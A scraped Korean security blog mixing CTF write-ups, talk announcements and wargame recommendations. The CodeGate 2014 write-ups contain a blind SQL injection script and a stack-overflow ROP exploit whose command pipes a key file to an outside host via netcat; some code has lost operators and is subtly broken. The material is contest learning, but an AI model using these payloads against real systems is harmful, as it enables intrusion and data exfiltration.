| CVE-2012-4792 IE Use-After-Free Analysis and Exploit (2) | 2014.04.26 |
| 2014 CodeGate Junior PreQual - Lotto (1) | 2014.02.16 |
| HackIM nullcon exploitation 100 write-up [exploit] (0) | 2014.01.27 |
Comment 2
Inc0gnito 2014 - Fuzzing For Fun
발표자료는 아래에서 받을 수 있습니다.
생각보다 하고 싶은 말을 많이 못한것 같네요..
항상 발표할때 습관인 초반에 긴장때문에 말도 더듬더듬 하기도 했는데 도움이 되셨으면 합니다.
의문점이 있는것은 덧글로 달아주시면 감사하겠습니다
http://cloud.sweetchip.kr/speak/Inc0gnito_fuzzing_for_fun_sweetchip.pdf
http://www.slideshare.net/sweetchip/inc0gnito-fuzzing-forfunsweetchip
감사합니다.
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
| 무료 SSL 인증서 발급 받기 (letsencrypt) (0) | 2017.02.02 |
|---|---|
| MSRC Top 100 선정! (5) | 2015.08.16 |
| Inc0gnito 2014 - Fuzzing For Fun (6) | 2014.08.20 |
| 생애 첫 국외 프로그램 취약점 헌팅 (6) | 2014.07.31 |
| Microsoft Internet Explorer 11 0-day Exploit POC (1) | 2014.06.01 |
| 차세대 보안 리더 양성 프로그램 Best Of the Best 3기 모집 시작 (18) | 2014.05.12 |
Comment 6
-
비밀댓글입니다
- ㄴ
우와 수고하셨습니다. 인사도 하고 4층에 발표도 보러갔어야되는데 시상식 준비일이 너무바빠서 못했네요ㅜㅠ 수고하셨어요
- ㄴ
생애 첫 국외 프로그램 취약점 헌팅
[잡담글 ㅋㅋ]
Whitehash 1기를 진행하면서 찾은 브라우저 제로데이 취약점..
취약점의 종류는 Memory Corruption 종류 중 하나였고, 코드의 흐름이 완벽하게 통제할 수 있는 취약점이다.
덕분에 Arbitrary Code Execution이 가능해서 해커들의 친한 친구인 계산기도 만날 수 있었다.
물론 처음에 어떤 보호기법에 막히기도 했지만 조금(이라 쓰고 1달이라 읽는다) 생각하고 나니 쉽게 영향을 받지 않고 코드 흐름을 바꿀 수 있었다.
이 보호기법에 대해선 나중에 시간이 날때 포스팅 하도록 하겠다 (막상 해보고는 실망할 정도로 간단 했다.)
그리고 드디어..
내 생애 첫 CVE와 MS 넘버링을 가지게 되었다. ㅋㅋ
2013년이 끝나면서 새로 지은 2014년 목표가 CVE 넘버를 1개이상 가져보는것이었는데 어쩌다 보니 목표를 달성하게 되었다.
물론 같은 취약점을 발견한 사람은 전세계에서 나 말고 3명이 더 있긴 하지만, 찾고 공격에 성공한게 어디인가하고 일단은 만족 하기로 했다.
하지만 내 닉넴 위 아래로 보면 도데체 뭐 하는 사람들인지 알 수가 없는 사람들이 수십개는 기본으로 제보한 사람도 있다 -_-
그런 사람들한테는 새발의 피지만 올해 처음으로 재밌는 취약점을 찾게 되어서 기뻣으니 만족.
이제는 IE에 Isolated Heap과 Protected Heap 이라는 기술이 적용되어서 Internet explorer를 공격하기가 더욱 어려워졌다. (생각보다 많이..)
크롬이나 사파리 같은 브라우저에선 예전부터 적용된 것이긴 하지만 (Isolated Heap) IE는 지금까지 그런 기술이 없어서 다른 브라우저에 비하여 공격이 쉬웠다.
머지 않아 새로운 우회기법이 나오긴 하겠지만 그래도 이젠 쉽지는 않으리라 본다. (덕분에 이전까지 연구중이던 다수의 취약점도 날렸다.)
그리고 Isolated Heap과 Protected Heap도 역시 조만간 포스팅을 해보려고 한다.
보호기법이 등장하긴 했지만 아직 취약점은 존재한다.
뻘 포스팅 끝 ㅋㅋ (새벽에 쓰고보니 참 두서 없다.)
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
| MSRC Top 100 선정! (5) | 2015.08.16 |
|---|---|
| Inc0gnito 2014 - Fuzzing For Fun (6) | 2014.08.20 |
| 생애 첫 국외 프로그램 취약점 헌팅 (6) | 2014.07.31 |
| Microsoft Internet Explorer 11 0-day Exploit POC (1) | 2014.06.01 |
| 차세대 보안 리더 양성 프로그램 Best Of the Best 3기 모집 시작 (18) | 2014.05.12 |
| CODEGATE 2014 track0 - 버그 헌팅 챌린지 (bug hunting challenge) (0) | 2014.04.07 |
Comment 6
-
비밀댓글입니다
- ㄴ
[Wargame] 해킹 공부에 도움이 되는 워게임
왠지 모르게 대학교가 방학을 해도 계속 바쁘게 지내는데 (그래도 bob 할때만은 아닙니다 ㅋㅋㅎ) 그러다 보니 블로그는 그냥 방치하게 되었네요
그래도 뭔가 써야 할것 같아서 생각해보다가 워게임에 대해서 생각나서 워게임에 대해 써보려고 합니다 ㅎㅎ
이번 글의 대상은 처음 공부하는 분들을 위주입니다.
/////
해킹보안을 공부하는 사람이라면 누구나 워게임이라는 것을 들었을 것이다.
아닌 분들을 위해 간단하게 적어보면 그냥 문제를 풀어보는 것이라고 생각하면 된다.
하지만 문제를 푼다고 하면 뭔가 재미가 없을것 같다고 생각할 수 있는데, 자세히 말하면 출제자가 프로그램또는 서비스되고 있는 환경을 출제한다.
물론 그 서비스에는 취약한 부분이 있는데 풀이자는 이런 취약점을 찾아서 공격해서 서버의 권한을 획득하거나
Flag라는 정답 파일을 읽어서 인증서버에 인증을 하며 문제를 푸는 직접 취약점을 찾아 공격하는 문제가 있고
프로그램의 알고리즘을 파악하여 역공학을 한다는지 (예를들어 키젠을 만드는것) 또는 Binary에 숨겨진 암호를 찾아서 정답을 맞추는 문제들도 있다.
이런 워게임을 풀다보면 그냥 글로 읽어서 터득하는 것 보다 재미있게 해킹공부를 할 수 있다.
또 다른사람하고 점수를 경쟁하거나 문제 형태로 출제되기 때문에 꼭 풀고 말거라는 마음을 가지게 되서 계속 연구하다 보면 알게 되는것이 많아
결국엔 자신의 실력이 향상되게 된다.
현재 국내에는 계속해서 워게임 사이트가 생기고 있고 최근에는 리눅스 시스템 해킹 문제를 출제하는 워게임 사이트도 생겼다.
이제 해킹 공부를 좀더 재밌게 해볼 수 있는 사이트 및 서비스를 소개해볼까 한다.
아래에 나와있는 것은 우리나라의 모든 워게임은 아니다. 찾아보면 더 있을 것이다.
WEB 분야
http://webhacking.kr/ - Webhacking.kr 은 국내에서 가장 유명한 웹 분야의 워게임 사이트이다. 문제들도 많고 계속 추가될 예정 이라고 한다.
Reverse Engineering 분야
http://reversing.kr/ - 리버스 엔지니어링 문제를 주로 다루고 있는 워게임 사이트이다. 좋은 문제들이 많다.
System 분야
HackerSchool FTZ
- http://search.naver.com/search.naver?where=nexearch&query=hackerschool ftz&sm=top_hty&fbm=2&ie=utf8
- 해커스쿨에서 제공하는 리눅스 기본문법에서 기본적인 해킹 공격을 접해볼 수 있다.
HackerSchool LOB
- http://www.hackerschool.org/Sub_Html/HS_Community/index.html
- 이 역시 해커스쿨에서 제공하는 리눅스의 해킹 공격을 접해볼 수 있다. FTZ 보다 난이도가 높고 다양한 보호기법이 새로이 적용된 문제도 많다.
http://pwnable.kr/ - 시스템 해킹 분야를 주로 다룬 워게임 사이트이다. 요즘 해킹대회에서 출제되는 형태의 문제이고 좋은 문제들이 많은 편이다.
http://exploit-exercises.com - [국외] VM 이미지로 문제를 제공한다. 소스코드도 함께 제공하며 문제 난이도도 다양함.
ETC - 다 분야
http://hack-me.org/ - 다양한 분야의 문제를 모아둔 사이트이다.
http://xcz.kr/ - 다양한 분야의 문제를 모아둔 사이트이다.
http://ctfagain.kr/ - 기존에 출제된 CTF 문제를 다시 풀어볼수 있도록 제공하는 사이트이다. 다양한 분야의 문제들이 있고 실제 해킹대회에 출제된 문제를 풀어볼 수 있다.
http://wargame.kr - 다양한 분야의 문제를 모아둔 사이트이다.
https://microcorruption.com - [국외]
현재 대충 이정도로 정리했지만 실제로는 여기에 나와있는 것보다는 더 많다.
시간이 생길때마다 계속 추가힐 예정이다.
'0x10 정보보안 > 0x12 이슈 상식' 카테고리의 다른 글
| [Wargame] 해킹 공부에 도움이 되는 워게임 (13) | 2014.07.19 |
|---|
Comment 13
-
sweetchip님 혹시 그...
리버싱 부분 추천해주신 부분이.. reversing.kr 적으시려다가 webhacking.kr 적으신건가요?- ㄴ
wargame.kr도 있지요
- ㄴ
정보저장소 찬양합니다.~~
나는 이거 https://microcorruption.com/, http://exploit-exercises.com
- ㄴ
hack-me.org 도 추가해주세요! 성원이형!
- ㄴ
this video is Internet Explorer 11 0-day vulnerability exploit poc demo
I found new IE11 0-day vulnerability and i researched it for a few days.
Finally, I controlled the flow successfully.
Special Thanks to mongli, passket and beist (Mentor of BOB program)
이 영상은 Internet Explorer 11의 제로데이 취약점 공격 데모 영상입니다.
새로운 IE11의 제로데이 취약점을 발견하고 며칠동안 연구한 결과 흐름을 성공적으로 조종할 수 있었습니다.
취약점 분석관련으로 많은 지식을 나눠 주신 mongli, passket, beist 분들께 감사드립니다.
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
Inc0gnito 2014 - Fuzzing For Fun (6) 2014.08.20 생애 첫 국외 프로그램 취약점 헌팅 (6) 2014.07.31 Microsoft Internet Explorer 11 0-day Exploit POC (1) 2014.06.01 차세대 보안 리더 양성 프로그램 Best Of the Best 3기 모집 시작 (18) 2014.05.12 CODEGATE 2014 track0 - 버그 헌팅 챌린지 (bug hunting challenge) (0) 2014.04.07 HackerSchool FTZ 서버 직접 구축 하는 방법 (4) 2012.09.16 Comment 1
-
와우... 대단하시네요..
차세대 보안 리더 양성 프로그램 Best Of the Best 3기 모집 시작
0x10 정보보안/0x11 security2014.05.12 13:55안녕하세요.
2013년 5월 12일 부터 6월 11일까지 BOB 3기 모집이 시작되었습니다.
BOB는 미래의 화이트 해커를 양성하기 위해서 만들어진 프로그램입니다.
교육생으로 선발되면 약 6~8개월간 기본 소양 교육과 심화교육 그리고 최소 2명 이상의 팀을 구성하여 프로젝트를 진행하게 됩니다.
///
2기 교육때는 멘토님들이 오셔서 기본 소양부터 프로그래밍, 리버싱등 여러 분야의 강의를 해주시고 가끔씩 해외 멘토도 오셔서 최대 일주일 정도 특강을 진행해 주셨습니다.
공부하는 분야는 화이트 해커가 가장 필요로 하는 윤리부터 시작해서 프로그래밍, 리버싱, 시스템, 네트워크, 컨설팅 등으로 대략 2달간 진행하게 되며
이후 프로젝트 기간에는 본인이 원하는 주제를 정해서 프로젝트 팀원을 구하고 분야별 멘토님과 함께 프로젝트를 진행할수 있습니다. (예를들어 취약점 자동 분석 툴 만들기)
///
자세한 것은 3기 지원을 모집하는 홈페이지를 참조하시고 지원하는 분들께 좋은결과가 있었으면 좋겠습니다.
모집 : 2014년 5월 12일 ~ 2014년 6월 11일
인원 : 대략 130명
사이트 : http://www.kitribob.kr
///
추가로 아래 글도 한번 읽어보세요.
제가 진심으로 존경하는 멘토님들중 한분께서 쓰신 bob에 대한 글입니다.
http://hackerschool.org/Sub_Html/HS_Posting/?uid=44
감사합니다.
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
Inc0gnito 2014 - Fuzzing For Fun (6) 2014.08.20 생애 첫 국외 프로그램 취약점 헌팅 (6) 2014.07.31 Microsoft Internet Explorer 11 0-day Exploit POC (1) 2014.06.01 차세대 보안 리더 양성 프로그램 Best Of the Best 3기 모집 시작 (18) 2014.05.12 CODEGATE 2014 track0 - 버그 헌팅 챌린지 (bug hunting challenge) (0) 2014.04.07 HackerSchool FTZ 서버 직접 구축 하는 방법 (4) 2012.09.16 Comment 18
-
참여 하고싶은대 아직 중학생이네요. ㅠㅠ
- ㄴ
비밀댓글입니다
- ㄴ
비밀댓글입니다
- ㄴ
고등학생인데 아직 아는게 c기본밖에 없는데 한번 해보는게 좋을까요?
- ㄴ
비밀댓글입니다
- ㄴ
-
ㄴ
2014.07.15 10:59 수정
비밀댓글입니다
비밀댓글입니다
-
ㄴ
우선은 BOB에서 교육생을 선발할 때 가장 중요하게 여기는 사항중 하나는 윤리의식입니다. 그 점을 잘 유의해두시길 바랍니다.
필기, 면접 시험은 이번엔 어떻게 될지 몰라서 합격 여부는 제가 알수 없을것 같습니다.
OS와 네트워크의 경우 공부하시다가 필요하시면 배우는게 좋을것 같습니다.
만약 필기시험에 나오는 분야들이라면 한번쯤 공부하고 가는게 좋겟지요,
커리큘럼은 3기에 대한 정보가 없어서 잘 모르겠고 그래도 어느정도 2기와 배우는 내용이 비슷하거나 더 좋은 내용이 아닐까 생각됩니다.
아무래도 저는 작년 교육생이었기 때문에 이번 연도에 대한 커리큘럼같은 자세한 내용은 정보가 없기 때문에 아무래도 bob 사이트를 참고하시는게 더 좋을것 같습니다.
감사합니다.
비밀댓글입니다
- ㄴ
- ㄴ
안녕하세요 sweetchip입니다.
BOB 2기 2학기당시 진행한 프로젝트를 진행하는 도중에 이전에 공개된 취약점을 분석하고 Exploit을 진행 했던 과정이 있었습니다.
그당시 문서로도 함께 제작해두었는데 왠지 필요하신 분이 있을것 같아서
그리고 조금더 분석을 편리하게 하는 방법을 공유하고자 문서를 공개하게 되었습니다.
당시 IE 분석은 '처음' 이었기 때문에 주로 취약점 분석과 공격을 '검색'하고 실습하면서 작성했기 때문에 IE 취약점 분석을 많이 해보신 분이라면
에이 뭐야 하실수도 있는 내용입니다.
도움이 되었으면 합니다.
CVE-2012-4792 Analysis Report(sweetchip)_release.pdf문서의 대부분은 짱짱해커들이 있는 Exodus Intelligence와 타 문서들, 그리고 블로그를 참고했고 다른 내용도 여러 블로그를 참고하면서 작성했습니다.
* 틀린 내용이 있다면 꼭 반드시 sweetchip@sweetchip.kr 로 보내주시면 감사하겠습니다.
'0x10 정보보안 > 0x15 System' 카테고리의 다른 글
[POC] Power Of XX 여성해킹대회 본선 - Brokenwindow (7) 2014.11.09 [Memory Protection] Internet Explorer - VTguard에 대하여 (2) 2014.08.20 CVE-2012-4792 IE Use-After-Free Analysis and Exploit (2) 2014.04.26 2014 CodeGate Junior PreQual - Lotto (1) 2014.02.16 HackIM nullcon exploitation 100 write-up [exploit] (0) 2014.01.27 HackIM nullcon exploitation 400 write-up [exploit] (5) 2014.01.27 Comment 2
2014년 4월 3일 진행되었던 코드게이트 행사 중 트랙 0번 에서 발표한 버그헌팅 챌린지 발표 자료를 배포 합니다.
http://cloud.sweetchip.kr/codegate/
위 링크가 받아지지 않는다면 아래 파일 링크로 받아주시면 감사하겠습니다.
발표 당시에는 발표자료가 16:9 비율로 제작되어서 4:3 비율로 급하게 바꾸느라 안보이는 글씨가 있었는데,
배포하는 발표자료는 16:9 로 배포 합니다.
204E362C0EF1E8C2624C098D0449EA4F.pdfhttp://www.slideshare.net/sweetchip/codegate-2014
'0x10 정보보안 > 0x11 security' 카테고리의 다른 글
Inc0gnito 2014 - Fuzzing For Fun (6) 2014.08.20 생애 첫 국외 프로그램 취약점 헌팅 (6) 2014.07.31 Microsoft Internet Explorer 11 0-day Exploit POC (1) 2014.06.01 차세대 보안 리더 양성 프로그램 Best Of the Best 3기 모집 시작 (18) 2014.05.12 CODEGATE 2014 track0 - 버그 헌팅 챌린지 (bug hunting challenge) (0) 2014.04.07 HackerSchool FTZ 서버 직접 구축 하는 방법 (4) 2012.09.16 Comment 0
CodeGate 2014 PreQual WeirdShark, dodoCrackme
0x10 정보보안/0x13 Write-Up2014.02.25 10:16dodoCrackme
binary
crackme_d079a0af0b01789c01d5755c885da4f6우선 바이너리는 64비트 크랙미 파일이며 string이 존재하지 않아 첫번째 멘붕을 시켜준 문제이다.
마음을 진정하고 strace를 해보았다.
helloworld@ubuntu:~/sweetchip$ strace ./c
execve("./c", ["./c"], [/* 19 vars */]) = 0
mmap(NULL, 30000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f7e1f22d000
write(1, "r", 1r) = 1
write(1, "o", 1o) = 1
write(1, "o", 1o) = 1
write(1, "t", 1t) = 1
write(1, "@", 1@) = 1
write(1, "l", 1l) = 1
write(1, "o", 1o) = 1
write(1, "c", 1c) = 1
write(1, "a", 1a) = 1
write(1, "l", 1l) = 1
write(1, "h", 1h) = 1
write(1, "o", 1o) = 1
write(1, "s", 1s) = 1
write(1, "t", 1t) = 1
write(1, "'", 1') = 1
write(1, "s", 1s) = 1
write(1, " ", 1 ) = 1
write(1, "p", 1p) = 1
write(1, "a", 1a) = 1
write(1, "s", 1s) = 1
write(1, "s", 1s) = 1
write(1, "w", 1w) = 1
write(1, "o", 1o) = 1
write(1, "r", 1r) = 1
write(1, "d", 1d) = 1
write(1, ":", 1:) = 1
write(1, " ", 1 ) = 1
read(0, zz
"z", 1) = 1
read(0, "z", 1) = 1
read(0, "\n", 1) = 1
write(1, "P", 1P) = 1
write(1, "e", 1e) = 1
write(1, "r", 1r) = 1
write(1, "m", 1m) = 1
write(1, "i", 1i) = 1
write(1, "s", 1s) = 1
write(1, "s", 1s) = 1
write(1, "i", 1i) = 1
write(1, "o", 1o) = 1
write(1, "n", 1n) = 1
write(1, " ", 1 ) = 1
write(1, "d", 1d) = 1
write(1, "e", 1e) = 1
write(1, "n", 1n) = 1
write(1, "i", 1i) = 1
write(1, "e", 1e) = 1
write(1, "d", 1d) = 1
write(1, " ", 1 ) = 1
write(1, "(", 1() = 1
write(1, "p", 1p) = 1
write(1, "a", 1a) = 1
write(1, "s", 1s) = 1
write(1, "s", 1s) = 1
write(1, "w", 1w) = 1
write(1, "o", 1o) = 1
write(1, "r", 1r) = 1
write(1, "d", 1d) = 1
write(1, ")", 1)) = 1
write(1, ".", 1.) = 1
write(1, "\n", 1
) = 1
_exit(0) = ?
exited with 0
보면 1글자씩 write를 하는것 같았다. 하지만 hex로 파일을 보면 string이 아예없고 비슷하게 모여있는것은 없었다.
그래서 ida로 열어보니 1바이트씩 계속 'inc byte ptr [rbp 0]' 연산을 하는것을 볼 수 잇엇는데 이같이 글자를 1개씩 늘려서 출력하는 것으로 예상하고
대충 찾아보았다. 그랬더니 H4PPY 가 맞춰지는 것을 보고 노가다를 뛰어서 키를 만들어냈다.
Key : H4PPY_C0DEGaTE_2014_CU_1N_K0RE4
#######################################################################################################################
WeirdShark
binary
매우 간단한 문제이다.
cap_len이 0xFE89413E 라서 매우 길다는 것인데 (최대 길이 62)
이를 찾아보면
가 있다. 이를 3e 00 00 00 으로 바꿔주고 실행하면 패킷이 잘 보이는데,
http로 전송된 파일목록을 모두 추출하면 여러 파일 중 pdf 가 보일것이다.
pdf를 살펴보면
Key : FORENSICS_WITH_HAXORS
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
Codegate 2015 Bookstore2 Write-up [Exploit] (2) 2015.04.18 Codegate 2015 Bookstore Write-Up [Exploit] (0) 2015.04.17 CodeGate 2014 PreQual WeirdShark, dodoCrackme (2) 2014.02.25 CodeGate 2014 PreQual CloneTechnique (2) 2014.02.25 CodeGate 2014 PreQual 120 Write Up (0) 2014.02.25 CodeGate 2014 PreQual Angry Doraemon (3) 2014.02.25 Comment 2
CodeGate 2014 PreQual CloneTechnique
0x10 정보보안/0x13 Write-Up2014.02.25 10:03binary
코드게이트에 출제된 윈도우 리버싱 문제이다.
다른 팀의 풀이를 보고 한숨 나왔다... 내가 삽질 한거구나.. -_-
프로그램은 자신을 400번이나 재 실행하는 프로그램이다.
프로그램을 분석해보면 재 실행 하는 과정 중 다음 복제할 프로그램의 인자를 생성하고 받은 인자로 키배열로 추정되는 배열을 연산시킨다.
ag1 = 0xA8276BFA
ag2 = 0x92F837ED
ror=lambda x, y: ((x & 0xFFFFFFFF) >> y) | (x << (32-y2)) & 0xFFFFFFFF
rol=lambda x, y: (x << y) & 0xFFFFFFFF | ((x & 0xFFFFFFFF) >> (32-y2))
def ROR(x, y):
x=bin(x & 0xFFFFFFFF)[2:].zfill(32)
start=x[:-y]
end=x[-y:]
return eval('0b' end start)
def ROL(x, y):
x=bin(x & 0xFFFFFFFF)[2:].zfill(32)
start=x[:y]
end=x[y:]
return eval('0b' end start)
def f_401280(a1, a2):
v4 = 1
i = 0
for i in range(0, a2):
v4 *= a1
return v4&0xffffffff
def wtf(str, a1, a2):
v3 = len(str) 1;
v6 = ""
for i in range(0, v3-1, 2):
v6 = chr(int(a1 & 0xff) ^ ord(str[i]))
a1 = ROL(a1, 5) ^ 0x2f
if str[i 1] == "":
break
v6 = chr(int(a2 & 0xff) ^ ord(str[i 1]))
a2 = (a1&0xff) ^ ROL(a2, 11)
return v6
if __name__ == '__main__':
ag3 = 1
flag = 0
key = "\x0F\x8E\x9E\x39\x3D\x5E\x3F\xA8\x7A\x68\x0C\x3D\x8B\xAD\xC5\xD0\x7B\x09\x34\xB6\xA3\xA0\x3E\x67\x5D\xD6"
newag1 = 0
newag2 = 0
newag3 = 1
f = open("result_last.txt", "wb")
for i in range(0, 400):
if i != 0:
ag1 = newag1
ag2 = newag2
ag3 = newag3
result = wtf(key, ag1, ag2)
ag1 = ag1 ^ 0xb72af098
tempag2 = ag1
ag1 *= ag2
ag1 ^= ag2
temp_ag1= ag1 & 0xffffffff
ag1 &= 0xffffffff
ag2 = tempag2
r2 = ""
f.write(result "\n")
ag1 = (29 * ag2 7 * f_401280(ag2, 2)) & 0xffffffff
ag2 = f_401280(ag1 ^ temp_ag1, ag1 % 2 5) & 0xffffffff
ttemp_ag2 = 0
exitcode = 0
if tempag2 >= 0xd0000000:
exitcode = 13 * (ag1 / 27) ^ 0x1f2a990d
ag1 = exitcode
ag2 = newag2
if flag == 0:
ag2 = f_401280(exitcode ^ ag2, exitcode % 30)
ag2 = 0
flag = 1
else:
ag2 = f_401280(newag2 ^ exitcode, exitcode % 30)
ttemp_ag2 = ag2
ag3 = 1
newag1 = ag1
newag2 = ag2
newag3 = ag3
f.close()
코드가 상당히 더러운편인데 그 만큼 멘붕을 했다는 뜻이다.
다른 풀이방법을 생각해보면 함수를 코드패치 해서 messagebox를 띄우는 방법이 있는 등 다른 좋은 방법이 많을 것이다.
대회 당시에도 생각을 하긴 햇지만 이미 코드는 반이상 짜둔터라 그냥 진행 하기로 했었다. [에휴]
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
Codegate 2015 Bookstore Write-Up [Exploit] (0) 2015.04.17 CodeGate 2014 PreQual WeirdShark, dodoCrackme (2) 2014.02.25 CodeGate 2014 PreQual CloneTechnique (2) 2014.02.25 CodeGate 2014 PreQual 120 Write Up (0) 2014.02.25 CodeGate 2014 PreQual Angry Doraemon (3) 2014.02.25 CodaGate 2014 PreQual WebProxy write-up (0) 2014.02.25 Comment 2
CodeGate 2014 PreQual 120 Write Up
0x10 정보보안/0x13 Write-Up2014.02.25 09:45문제는 웹 문제이며 Blind Sql Injection 문제이다.
랜덤으로 30글자의 password를 설정하고 120번동안 password를 맞출 수 있는 기회가 있는데 그 기회를 모두 사용하면 password가 초기화 되어 또 랜덤 30글자가 만들어진다
또한 문제 부분에 sql injection 취약점이 있으며 쿼리를 잘 조정하면 password를 빼올 수 있었는데, 총 30글자에 120번의 기회면 1글자당 4번의 기회가 있는 것이다.
기존에 내가 사용하던 무작위 대입으론 별로 효과가 없을 것이고 bit shift를 이용한 풀이도 또한 7번의 기회가 있어야 하므로 충분하지 않다. [최소한 4번의 기회가 필요하다.]
고민고민 중에 새로운 문서를 찾아보기도 하고 등등 했는데 [write up을 다쓰고보니 time-based blind sql injection을 한 분도 꽤나 많은것 같다.]
별로 소용이 없어서 다른 방법을 찾아보기로 했다.
session_start();
$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);
function RandomString()
{
$filename = "smash.txt";
$f = fopen($filename, "r");
$len = filesize($filename);
$contents = fread($f, $len);
$randstring = '';
while( strlen($randstring)<30 ){
$t = $contents[rand(0, $len-1)];
if(ctype_lower($t)){
$randstring .= $t;
}
}
return $randstring;
}
$max_times = 120;
if ($_SESSION['cnt'] > $max_times){
unset($_SESSION['cnt']);
}
if ( !isset($_SESSION['cnt'])){
$_SESSION['cnt']=0;
$_SESSION['password']=RandomString();
$query = "delete from rms_120_pw where ip='$_SERVER[REMOTE_ADDR]'";
@mysql_query($query);
$query = "insert into rms_120_pw values('$_SERVER[REMOTE_ADDR]', '$_SESSION[password]')";
@mysql_query($query);
}
$left_count = $max_times-$_SESSION['cnt'];
$_SESSION['cnt'] ;
if ( $_POST['password'] ){
if (eregi("replace|load|information|union|select|from|where|limit|offset|order|by|ip|\.|#|-|/|\*",$_POST['password'])){
@mysql_close($link);
exit("Wrong access");
}
$query = "select * from rms_120_pw where (ip='$_SERVER[REMOTE_ADDR]') and (password='$_POST[password]')";
$q = @mysql_query($query);
$res = @mysql_fetch_array($q);
if($res['ip']==$_SERVER['REMOTE_ADDR']){
@mysql_close($link);
exit("True");
}
else{
@mysql_close($link);
exit("False");
}
}
@mysql_close($link);
?>
times left
Auth
소스코드를 보니 아니나 다를까 ip와 session으로 서로 다른것을 체크하기 때문에 쿠키 값만 다르고 ip는 똑같다면 여러번의 기회를 만들 수 있다.
예를들어서 A 쿠키로 먼저 접속후 sql injection 쿼리를 날리고 , B 쿠키로 접속하면 다시 기회가 120번이 남아있는 것을 볼 수있다.
또 A쿠키로 접속해보면 (120 - sql injection시도 횟수) 만큼 기회가 남아 있을 것이다.
바로 blind sql injection 툴을 짯다.
#97 - 122
import httplib,urllib;
from urllib import urlopen
#password=0'<1) and (0<1) and(if(ascii(substr(password,1,2))<150, 1, 0)=1) or (1<'0
#password=0'<1) and (0<1) and((ascii(substr(password,1,2))>>6)>1) or (1<'0
headers = {"Content-type":"application/x-www-form-urlencoded","Cookie":"PHPSESSID=ztv6lne26k1tgf2q8803stn2ka5"}
host = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"
result = ""
bit = ""
flag = 0
Truematch = "True"
sqlcmd = "select pass from member where id = 1"
total = 0
def change():
headers = {"Content-type":"application/x-www-form-urlencoded","Cookie":"PHPSESSID=1ztv6lne26k1tgf2q8803stn2ka5"}
def request(site,charpos,sqlcmd,match_str):
result = 3
for bitpos in range(4,-1,-1):
temp_match_str = Truematch
result *= 2
injection = "0'<1) and (0<1) and((ascii(substr(password,%d,1))>>%d)=%d) or (1<'0"%(charpos,bitpos,result)
params = urllib.urlencode({'password':injection})
print injection
conn=httplib.HTTPConnection("58.229.183.24:80")
conn.request("POST","/5a520b6b783866fd93f9dcdaf753af08/index.php",params,headers)
#conn=httplib.HTTPConnection("192.168.0.93:80")
#conn.request("POST","/codegate.php",params,headers)
if charpos == 20:
change()
print headers["Cookie"]
headers["Cookie"] = "PHPSESSID=1ztv6lne26k1tgf2q8803stn2ka5"
print "HEADER CHANGED"
response = conn.getresponse()
if temp_match_str in response.read():
result = 0
print "true 0 "
else:
result = 1
print "false 1"
return chr(result)
charpos = 1
while 1:
try:
result = request(host,charpos,sqlcmd,Truematch)
charpos = 1
print result
if len(result) == 30: break
except Exception:
print "%s => %s"%(sqlcmd,result)
break
raw_input("> ")
#Congrats! the key is DontHeartMeBaby*$#@!
방식은 20글자만큼 뽑아내면 헤더를 바꾸는 방식으로 진행했다. 그러면 먼저 사용한 쿠키엔 100번을 사용했고 나머지 쿠키는 아직 120번의 기회가 있으니 충분하다.
그리고 뽑아오는 방식은 bit shift 를 이용했고 paste bin 에 있는 기존 소스를 수정한 것이다.
Key : DontHeartMeBaby*$#@!
'0x10 정보보안 > 0x13 Write-Up' 카테고리의 다른 글
CodeGate 2014 PreQual WeirdShark, dodoCrackme (2) 2014.02.25 CodeGate 2014 PreQual CloneTechnique (2) 2014.02.25 CodeGate 2014 PreQual 120 Write Up (0) 2014.02.25 CodeGate 2014 PreQual Angry Doraemon (3) 2014.02.25 CodaGate 2014 PreQual WebProxy write-up (0) 2014.02.25 2014 CodeGate Junior PreQual - Nuclear [exploit] (12) 2014.02.16 Comment 0
CodeGate 2014 PreQual Angry Doraemon
0x10 정보보안/0x13 Write-Up2014.02.25 09:36Binary :
angry_doraemon_c927b1681064f78612ce78f6b93c14d9문제엔 두부분으로 공격할 수 있다.
1. Stack Based Buffer Overflow
2. Pointer
1번은 bof 취약점이 있는 부분을 공격하면 되고, 2번은 4바이트의 값을 받고 그곳으로 점프한다. 하지만 필터링을 우회해야 한다.
예를들어서 AAAA 를 넣으면 0x41414141 로 점프하는 방법이다.
어떤 방법으로든 할순 있겠지만 아이디어가 떠오르지 않아 BOF 방향으로 진행했다.
그리고 이문제를 풀면서 스택쿠키가 4바이트이고 그 값이 똑같으면 우회할 수 있다는 것을 처음 알게 되었다.
이하 Exploit
from socket import *
import struct
import time
ip = "58.229.183.18"
#ip = "192.168.0.109"
port = 8888
p = lambda x : struct.pack("
up = lambda x : struct.unpack("
read = 0x08048620
write = 0x080486e0
write_got = 0x0804b040
freespace = 0x0804bc00
f_throwmouse = 0x08048fc6
cmd = "cat key|nc 220.117.247.200 31333\x00"
pppr = 0x080495bd
#write : e0910
#system : 41260
#write - system = 9F6B0
def stage1_payload(canary):
payload = "y"*10
payload = canary
payload = "A"*12
payload = p(write)
payload = p(pppr)
payload = p(4)
payload = p(write_got)
payload = p(4)
payload = p(f_throwmouse)
payload = "AAAA"
payload = p(4)
return payload
def stage2_payload(canary, write_ptr):
system = write_ptr - 0x9f6b0
payload = "y"*10
payload = canary
payload = "A" *12
payload = p(read)
payload = p(pppr)
payload = p(4)
payload = p(freespace)
payload = p(len(cmd))
payload = p(system)
payload = "AAAA"
payload = p(freespace)
return payload
#################################################################
#####################[ get canary ]]####################
#################################################################
s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, port))
print s.recv(0x1024)
print s.recv(0x1024)
print s.recv(0x1024)
print s.recv(0x1024)
raw_input("[*] Get canary. . .")
s.send("4\n")
print s.recv(0x1024)
s.send("y"*11)
canary = s.recv(0x1024)[12 11:]#.encode("hex")
canary = canary[:len(canary)-3]
print "canary : " canary
canary = "\x00" canary[:3] # result
print "canary result : " canary[::-1].encode("hex")
s.close()
#################################################################
#####################[ staged_exploit ]]####################
#################################################################
s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, port))
